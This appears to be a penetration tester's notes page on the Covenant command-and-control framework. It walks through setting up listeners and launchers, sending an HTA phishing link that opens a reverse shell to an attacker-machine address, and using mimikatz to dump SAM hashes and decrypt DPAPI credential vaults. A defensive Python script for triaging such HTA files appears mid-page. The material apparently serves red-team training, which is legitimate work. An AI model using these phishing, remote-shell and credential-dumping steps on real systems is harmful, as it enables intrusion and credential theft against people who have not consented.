Covenant

Last updated 2 years ago

Installation

Install Dotnet

cd /tmp  
wget https://packages.microsoft.com/config/ubuntu/21.04/packages-microsoft-prod.deb -O packages-microsoft-prod.deb 
sudo dpkg -i packages-microsoft-prod.deb 
sudo apt update -y  
sudo apt-get install -y apt-transport-https dnsutils 
sudo apt-get update  
sudo apt-get install -y dotnet-sdk-3.1 

Install and launch Covenant

sudo git clone --recurse-submodules https://github.com/ZeroPointSecurity/Covenant.git /opt/Covenant 
cd /opt/Covenant/Covenant
sudo dotnet run
  • Navigate to https://127.0.0.1:7443, set up your user and you should be good to go.

Start a listener

  • This is one of the first things to do: go to the Listeners tab and click on Create.

  • Fill in the fields as you wish. Here is mine (note: when playing on HTB or THM, the IP will be your tun interface IP).

Create a Launcher to get a shell

  • Once the PowerShell code has been run on the target, you should see that a grunt has popped.

Launchers type

  • Binary: Generates a custom binary to launch a grunt; does not rely on a system binary.

  • PowerShell: Generates PowerShell code to launch a grunt using powershell.exe.

Local Enumeration

  • Suppose we have a grunt (a shell on the target) and we want to enumerate the target.

  • Click on the grunt > Interact

  • Use Seatbelt: Seatbelt -group=all

    • We will get useful info: local users, DNS info (such as the email domain), interesting files, etc.

  • Use the command GetDomainUser to enumerate domain users

  • Use the command GetNetLoggedOnUser to get a list of logged-on users

  • Use the command GetNetLocalGroup to get a list of local groups

  • etc.

hta Email Phishing

  • Create an .hta file on your attacking machine:

<script language="VBScript">
  Function DoStuff()
    Dim wsh
    Set wsh = CreateObject("Wscript.Shell")
    wsh.run "<powershell command here>"
    Set wsh = Nothing
  End Function

  DoStuff
  self.close
</script>
  • Create an HTTP listener in Covenant

    • Listener > create

    • The table in Listeners should look like this:

      Name            ListenerType   Status   StartTime             ConnectAddresses       ConnectPort
      HTTP Listener   HTTP           Active   3/7/2022 8:28:13 PM   IP-OF-ATTACK-MACHINE   80

    • Go to Launchers > PowerShell

    • Fill in the info; be careful that the kill date is later in the future (not in the past)

    • Click on Generate

    • Copy the encoded launcher and put it in the script above instead of <powershell command here>

    • Save the script

    • Go back to Listeners and click on the listener that was just set up

    • Go to Hosted Files and, in Path, enter /name-of-your-script.hta

    • Click on Browse and select your script

    • And click on Create

    • If we go to http://localhost/name-of-your-script.hta we should be able to download it

  • We can now send an email with a link to our reverse shell: http://IP-OF-ATTACK-MACHINE/name-of-your-script.hta

  • When the user clicks the link and runs the script, we will get our reverse shell

  • If we go to Covenant again and check in Grunts, we should have a new one

  • If you are not able to execute commands (they stay Uninitialized), try either of these:

    • Verify the kill date of the launcher

    • The UI may not allow changing the date. This can be fixed by deleting the /opt/Covenant/Covenant/data/covenant.db file and restarting the service. You will lose all data and need to create a new user to log in with.
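From the defender's side, the .hta described above leaves a recognisable shape: VBScript creating a Wscript.Shell object, calling .run, and handing an encoded PowerShell command to the shell. The following triage script is an added example, not code from this page or from the Covenant project: it scans an .hta for those indicators and, when an encoded command is present, decodes it (base64 of UTF-16LE text, which is what PowerShell's -EncodedCommand expects) so an analyst can read what the file would run without executing it. The sample .hta, its harmless encoded command, the benign comparison file, the indicator names and the two-indicator threshold are all constructed assumptions for the example.

```python
import base64
import re

# Constructed sample .hta following the VBScript template above, with the
# placeholder replaced by a harmless encoded command. This is an assumption for
# the example, not a real launcher. PowerShell's -EncodedCommand expects base64
# of the command text in UTF-16LE.
SAMPLE_COMMAND = "Write-Host 'hello from the sample'"
SAMPLE_ENCODED = base64.b64encode(SAMPLE_COMMAND.encode("utf-16le")).decode("ascii")
SAMPLE_HTA = f'''<script language="VBScript">
  Function DoStuff()
    Dim wsh
    Set wsh = CreateObject("Wscript.Shell")
    wsh.run "powershell -w hidden -enc {SAMPLE_ENCODED}"
    Set wsh = Nothing
  End Function

  DoStuff
  self.close
</script>'''

# Constructed benign .hta for comparison: it only writes to its own window.
BENIGN_HTA = '<html><body><script language="JScript">document.write("Hello");</script></body></html>'

# Indicators worth flagging in an .hta: a shell object created from script, a
# process being launched from it, a hidden window, and an encoded command.
INDICATORS = {
    "wscript_shell": re.compile(r'CreateObject\(\s*"W?Script\.Shell"\s*\)', re.I),
    "shell_run": re.compile(r'\.(?:run|exec)\s', re.I),
    "hidden_window": re.compile(r'-w(?:indow(?:style)?)?\s+hidden', re.I),
    "encoded_command": re.compile(r'-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})', re.I),
}


def decode_encoded_command(blob: str):
    """Decode a PowerShell -EncodedCommand blob (base64 of UTF-16LE text).
    Returns None when the blob is not valid base64 or not valid UTF-16LE."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def triage_hta(hta_text: str) -> dict:
    """Report which indicators fire in the .hta text, an overall verdict, and
    the decoded PowerShell command when one is embedded, so the analyst can
    read what the file would run without executing it."""
    hits = {name: bool(rx.search(hta_text)) for name, rx in INDICATORS.items()}
    match = INDICATORS["encoded_command"].search(hta_text)
    decoded = decode_encoded_command(match.group(1)) if match else None
    score = sum(hits.values())
    return {
        "indicators": hits,
        "score": score,
        # Two or more indicators together is the (assumed) threshold used here.
        "suspicious": score >= 2,
        "decoded_command": decoded,
    }


if __name__ == "__main__":
    for label, text in (("sample", SAMPLE_HTA), ("benign", BENIGN_HTA)):
        result = triage_hta(text)
        print(f"{label}: suspicious={result['suspicious']} score={result['score']}")
        if result["decoded_command"]:
            print("  decoded command:", result["decoded_command"])
```

Run it on a downloaded .hta by reading the file into a string and passing it to triage_hta; the decoded command is the part an analyst usually wants first, since the base64 blob hides what the launcher actually does. The regexes accept the short PowerShell switch forms (-e, -ec, -enc, -w) as well as the long ones, because both appear in practice.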

Dump hashes with mimikatz

  • In a high-integrity grunt

  • We can use this to see if any plaintext info might come out: Mimikatz token::elevate lsadump::secrets

  • This will dump the SAM file (where password hashes are stored in Windows): Mimikatz token::elevate lsadump::sam

  • Covenant will save the credentials in the Data section as well

Cracking Credential Vault with mimikatz

  • We need a medium-integrity grunt

  • mimikatz vault::cred will show all services with persisted passwords

  • ls C:\users\user\appdata\local\microsoft\credentials will list the password files; the smallest of the files is generally the one we need.

  • We then go to the Task tab in our grunt, select Mimikatz from the list and type this task: "dpapi::cred /in:C:\users\user\appdata\local\microsoft\credentials\FILE-PREVIOUSLY-CHOSEN"

  • From the output of the task we need to keep aside the value of guidMasterKey

  • ls C:\users\user\appdata\roaming\microsoft\protect should list a directory with an SID value at the end

  • If you do an ls on this directory, it should list the same path with the guidMasterKey value we previously found. We need to copy the full path, then go to Task again and, using Mimikatz, type "dpapi::masterkey /in:C:\users\user\appdata\roaming\microsoft\protect\sid\guidMasterKey /rpc"

  • This way we will get, at the end of the output, the key for the domain controller, which should look like this: key : 60f202bff3c6e2eaedfc4c28ac1adbdd102ec7dba401157f6f8c2056205507ed4e6d93120ebe48959751c0f2c939e515382d7ffec7bd2b129c8eb89466b31f0f

  • We need to keep this key aside

  • We go back to Task and type "dpapi::cred /in:C:\users\user\appdata\local\microsoft\credentials\sid /masterkey:"

  • This should dump the domain password; you should see it at the end of the output:

    UserName       : domain\Administrator
    CredentialBlob : Password123!

Common issues with Covenant

  • Issue - The dashboard is acting weird and not allowing the creation of listeners, payloads, etc.

    • Solution - Delete /opt/Covenant/Covenant/data/Covenant.db and restart Covenant.

  • Issue - I can get a Grunt to connect back to Covenant, but when attempting to run commands it just sits on uninitialized and doesn't execute.

    • Solution - This is likely an issue with the Grunt kill date. It's your responsibility to pay attention to the kill date in the launcher generator to ensure it is a date and time in the future. In rare circumstances the UI may not allow changing the date. This can be fixed by deleting the /opt/Covenant/Covenant/data/Covenant.db file and restarting the service. Note you will lose all data and need to create a new user to log in with. This is a known issue with Covenant.

Launchers type (continued)

We can go to Launchers and choose the one we need. For example, if we have an initial foothold on a Windows machine we could use a PowerShell launcher.

Say we wanted a PowerShell launcher: we need to choose a listener, so we can select the HTTP one we just created, then we just have to click Generate (or Download, depending on how you will use it) and use the given code. (Note: make sure to use a date later in time for the killDate.)

The other launcher types are:

  • Shellcode: Converts a binary to shellcode using donut.

  • MSBuild: Generates an MSBuild XML file to launch a grunt using msbuild.exe.

  • InstallUtil: Generates an InstallUtil XML file to launch a grunt using installutil.exe.

  • Mshta: Generates an HTA file to launch a grunt using mshta.exe.

  • Regsvr32: Generates an SCT file to launch a grunt using regsvr32.exe.

  • Wmic: Generates an XSL file to launch a grunt using wmic.exe.

  • Cscript: Generates a JScript file to launch a grunt using cscript.exe.

  • Wscript: Generates a JScript file to launch a grunt using wscript.exe.

Resources

  • GitHub - cobbr/Covenant: Covenant is a collaborative .NET C2 framework for red teamers (get Covenant here)

  • Movement, Pivoting and Persistence for Pentesters and Ethical Hackers - TCM Security Academy